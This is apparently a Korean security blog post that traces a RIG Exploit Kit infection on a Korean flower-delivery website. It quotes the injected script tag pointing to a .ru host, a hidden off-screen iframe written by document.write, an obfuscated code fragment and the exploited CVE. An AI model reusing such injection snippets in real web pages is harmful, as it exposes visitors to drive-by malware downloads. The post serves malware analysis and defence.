posted by Kwan's 2015.09.01 16:01

그냥 국내 웹사이트 중 리그킷 들어가 있는 곳을 발견해서 간단하게 흔적용으로 써봄.


1. 발견 사이트

http://www.irisxxxxxx.kr (꽃배달 사이트)

→ http://autoxxxx.ru/templates/atomic/z9jqqbt7.php?id=8515037

-→ http://new.ceptenporxxxxx.com/?xH6Af7iYJBvPCoo[하위생략] / (지속적인 링크 변경)

--→ http://new.ceptenporxxxxxx.com/index.php?xH6Af7iYJBvPCoo=[하위생략] / 최종 악성코드 다운로드


2. 삽입 형태

http://www.irisxxxxxx.kr

→ _script type="text/javascript" src="http://autoxxxx.ru/templates/atomic/z9jqqbt7.php?id=8515037"_


http://autoxxxx.ru/templates/atomic/z9jqqbt7.php?id=8515037

→ _document_write('_iframe src="http://new.ceptenporxxxxx.com/?xH6Af7iYJBvPCoo[하위생략] " style="left: -999px;top: -999px;position: absolute;" width="202" height="202"__/iframe_');


http://new.ceptenpoxxxxx.com/?xH6Af7iYJBvPCoo[하위생략]

→ /*(331387,4,14838)*/uo7("119p105p110p100");/* [생략]


3. 악성 스크립트 스샷

[그림 1. 난독화 된 RIG Exploit Kit 스크립트 ]


[그림 2. 디코딩 된 RIG Exploit Kit 스크립트]



[그림 3. 일부 디코딩 된 RIG Exploit Kit 스크립트 - CVE-2014-6332]




[그림 4. 디코딩 된 스크립트 중 일부 쉘코드에서 발견된 최종링크 연결]


4. 끄적끄적

분석을 방해하기 위한 주석등이 너무 많이 달림 일부 스크립트에서는 짤라서 쓰는걸 방지하기 위해 정의 선언이 되지 않은 코드도 넣음 지우고 처리하는데 조금 신경쓰임.. 국내에는 다양한 공격킷이 존재하지만 리그킷과 같은 경우 연구 대상(?) 다음번에는 앵글러를 한번 해 볼 생각...

아참 최종 유포지와 난독화 해제 부분만 언급했는데 어느 취약점을 이용하는지는 추후에 게시(?) 할 예정.

제목과 같이 그냥 끄적끄적..ㅎㅎ 이렇게 된다 정도?ㅎㅎ


[이전글]

2014/08/27 - [security/악성코드 유포] - RIG Exploit Kit 넌 누구냐?


TAG